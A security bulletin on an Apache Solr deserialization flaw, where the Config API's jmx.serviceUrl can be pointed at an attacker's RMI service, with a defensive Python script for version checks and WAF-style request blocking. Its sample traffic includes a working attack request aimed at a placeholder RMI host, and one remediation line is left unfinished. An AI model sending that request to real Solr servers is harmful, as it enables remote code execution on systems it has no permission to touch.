On March 7, 2019, the Alibaba Cloud Security emergency response center noted a security bulletin issued by the Apache Solr project. An attacker who can reach the Solr Config API can use it to set the jmx.serviceUrl property so that it points to an RMI service under the attacker's control; when Solr connects to that service, the data it receives is Java-deserialized, which gives the attacker remote code execution (RCE) on the Solr host. Solr does not enable authentication by default, so on an exposed instance any client that can reach the Solr HTTP port can make this Config API call.
Vulnerability name: Deserialization RCE vulnerability in Apache Solr

Affected versions:

- Apache Solr 5.0.0 to 5.5.5
- Apache Solr 6.0.0 to 6.6.5
Solutions:

- Upgrade Apache Solr to 7.0 or later, which is not affected.
- Disable the Config API by configuring
- Ensure that only trusted traffic is allowed to access the Solr server at the network layer.
If you cannot upgrade Solr right away, we recommend that you use the custom protection policy feature of Alibaba Cloud WAF to block Config API requests that set jmx.serviceUrl until the upgrade is done. Note that a WAF only inspects traffic that passes through it: clients that can reach the Solr port directly bypass the policy, so the network-layer restriction above is still required.
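The following Python script is an added example and is not part of the bulletin or of Apache Solr. It shows the two checks a practitioner would want alongside the advice above: a version check against the affected ranges listed in this bulletin, and the request-inspection logic a custom WAF policy would apply, flagging Config API edits that set jmx.serviceUrl. The core name `mycore`, the RMI address `192.0.2.10:1099`, and the sample requests are constructed for this example; the `/solr/<core>/config` path and the `set-property` command are the real Config API shape.

```python
"""Offline checks for the Solr Config API / jmx.serviceUrl issue (added example).

1. is_affected_version(): compares a Solr version string against the ranges
   named in the bulletin (5.0.0-5.5.5 and 6.0.0-6.6.5, inclusive).
2. classify_request(): the decision a WAF custom rule would make for one
   HTTP request: block Config API edits that set jmx.serviceUrl, let
   everything else through.
All sample data at the bottom is constructed for illustration.
"""
import json
import re
from urllib.parse import urlparse

# Affected version ranges taken from the bulletin above.
AFFECTED_RANGES = [((5, 0, 0), (5, 5, 5)), ((6, 0, 0), (6, 6, 5))]


def parse_version(spec):
    """Turn a version string such as '6.6.5' (the value Solr reports as
    lucene.solr-spec-version) into a comparable (major, minor, patch) tuple."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", spec)
    if not m:
        raise ValueError("unrecognised Solr version: %r" % (spec,))
    return tuple(int(x) for x in m.groups())


def is_affected_version(spec):
    """True if the given Solr version falls inside an affected range."""
    v = parse_version(spec)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


# The Config API lives at /solr/<core-or-collection>/config; edits are JSON
# POSTs whose top-level keys are commands such as "set-property".
CONFIG_PATH = re.compile(r"^/solr/[^/]+/config/?$")


def find_jmx_service_url(body):
    """Return the jmx.serviceUrl value a Config API edit would set, or None.

    Only "set-property" can point Solr at a new RMI service, so that is the
    only command inspected. Malformed or non-JSON bodies are treated as
    'nothing to flag' here; a stricter deployment could block those too.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    if not isinstance(doc, dict):
        return None
    props = doc.get("set-property")
    if isinstance(props, dict) and "jmx.serviceUrl" in props:
        return str(props["jmx.serviceUrl"])
    return None


def classify_request(method, path, body):
    """Return ('block', reason) or ('allow', None) for one HTTP request.

    Read-only GETs to the Config API and edits of other properties are
    allowed; any POST that sets jmx.serviceUrl is blocked, whatever the
    value, because a legitimate deployment changes it through solr.xml or
    system properties rather than through an unauthenticated HTTP call.
    """
    if method.upper() != "POST":
        return ("allow", None)
    if not CONFIG_PATH.match(urlparse(path).path):
        return ("allow", None)
    url = find_jmx_service_url(body)
    if url is None:
        return ("allow", None)
    return ("block", "Config API edit sets jmx.serviceUrl=%s" % url)


# Constructed sample traffic: one read, one harmless edit, one attack attempt.
SAMPLE_REQUESTS = [
    ("GET", "/solr/mycore/config", ""),
    ("POST", "/solr/mycore/config",
     '{"set-property": {"updateHandler.autoCommit.maxTime": 15000}}'),
    ("POST", "/solr/mycore/config?wt=json",
     '{"set-property": {"jmx.serviceUrl": '
     '"service:jmx:rmi:///jndi/rmi://192.0.2.10:1099/obj"}}'),
]


def run_samples():
    """Classify every constructed sample request; returns the verdicts."""
    return [classify_request(m, p, b)[0] for m, p, b in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for ver in ("5.5.5", "6.6.5", "7.0.0"):
        print(ver, "affected" if is_affected_version(ver) else "not affected")
    for (m, p, _), verdict in zip(SAMPLE_REQUESTS, run_samples()):
        print(m, p, "->", verdict)
```

The request check deliberately keys on the property name rather than on the RMI URL format, so it also catches a jmx.serviceUrl value that points at a non-RMI or obfuscated endpoint; the version check is only as reliable as the version the instance reports, so treat it as a triage aid and confirm the actual build on the host.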